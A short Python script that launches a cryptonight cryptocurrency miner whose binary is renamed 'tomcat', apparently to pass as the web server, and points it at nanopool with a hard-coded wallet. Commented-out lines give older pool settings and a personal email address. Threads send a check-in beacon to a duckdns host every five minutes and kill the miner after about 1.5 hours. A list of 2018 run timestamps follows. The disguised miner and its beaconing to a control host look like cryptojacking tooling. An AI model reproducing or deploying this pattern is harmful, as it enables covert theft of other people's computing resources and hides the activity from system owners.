import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:01.528662
#2018-02-17 16:32:06.560893
#2018-02-17 18:20:06.586377
#2018-02-17 20:08:07.067768
#2018-02-17 21:55:04.109526
#2018-02-17 23:40:07.032507
#2018-02-18 01:31:06.028936
#2018-02-18 03:17:01.896401
#2018-02-18 05:06:04.018272
#2018-02-18 06:59:02.131561
#2018-02-18 08:47:03.955409
#2018-02-18 10:34:01.396041
#2018-02-18 12:19:01.925985
#2018-02-18 14:06:06.473065
#2018-02-18 15:55:08.026804
#2018-02-18 17:46:05.488299
#2018-02-18 19:34:07.489471
#2018-02-18 21:19:05.883168
#2018-02-18 23:07:01.987210
#2018-02-19 00:54:06.789478
#2018-02-19 02:41:07.061152
#2018-02-19 04:28:03.740026
#2018-02-19 06:13:02.011618
#2018-02-19 07:59:05.509248
#2018-02-19 09:50:07.273834
#2018-02-19 11:40:10.666038
#2018-02-19 13:26:08.823589
#2018-02-19 15:14:01.760504
#2018-02-19 17:04:02.180997
#2018-02-19 18:52:02.143350
#2018-02-19 20:29:06.792509
#2018-02-19 22:17:07.747297
#2018-02-20 00:04:07.923045
#2018-02-20 01:51:05.539785
#2018-02-20 03:41:06.548919
#2018-02-20 05:27:07.633767
#2018-02-20 07:11:04.104552
#2018-02-20 08:57:02.056339
#2018-02-20 10:41:01.408833
#2018-02-20 12:27:04.251323
#2018-02-20 14:14:04.616158
#2018-02-20 15:59:09.038568
#2018-02-20 17:48:01.793143
#2018-02-20 19:34:07.597128
#2018-02-20 21:21:04.424199
#2018-02-20 23:07:01.361171
#2018-02-21 00:51:05.095327
#2018-02-21 02:36:04.336181
#2018-02-21 04:24:05.698351
#2018-02-21 06:12:01.669838
#2018-02-21 07:57:17.481800
#2018-02-21 09:45:10.418910
#2018-02-21 11:35:04.012866
#2018-02-21 13:25:10.037044
#2018-02-21 15:10:11.999065
#2018-02-21 17:01:10.082362
#2018-02-21 18:49:01.850954
#2018-02-21 20:39:07.280093
#2018-02-21 22:24:08.227456
#2018-02-22 00:14:08.855064
#2018-02-22 02:02:06.723189
#2018-02-22 03:49:04.252432
#2018-02-22 05:35:07.867479
#2018-02-22 07:20:08.346490
#2018-02-22 09:08:01.398092
#2018-02-22 10:56:08.806473
#2018-02-22 12:42:09.575246
#2018-02-22 14:28:06.497821
#2018-02-22 16:15:03.655651
#2018-02-22 18:03:11.168726
#2018-02-22 19:53:02.059959
#2018-02-22 21:42:01.775178
#2018-02-22 23:28:06.808718
#2018-02-23 01:18:06.117184
#2018-02-23 03:04:04.084762
#2018-02-23 04:49:06.743105
#2018-02-23 06:36:06.020040
#2018-02-23 08:23:07.408288
#2018-02-23 10:39:05.238587
#2018-02-23 12:33:06.312145
#2018-02-23 14:20:04.860596
#2018-02-23 16:11:05.012111
#2018-02-23 17:57:06.321456
#2018-02-23 19:44:01.271572
#2018-02-23 21:27:06.767194
#2018-02-23 23:16:04.538449
#2018-02-24 01:07:04.140722
#2018-02-24 02:57:01.751049
#2018-02-24 04:46:01.269088
#2018-02-24 06:32:07.387282
#2018-02-24 08:21:05.146012
#2018-02-24 10:05:07.951592
#2018-02-24 12:03:03.891085
#2018-02-24 13:50:04.380890
#2018-02-24 15:41:07.050385
#2018-02-24 17:35:02.510066
#2018-02-24 19:21:05.530178
#2018-02-24 21:12:04.107849
#2018-02-25 01:17:03.972038
#2018-02-25 05:16:01.299971
#2018-02-25 11:07:01.542789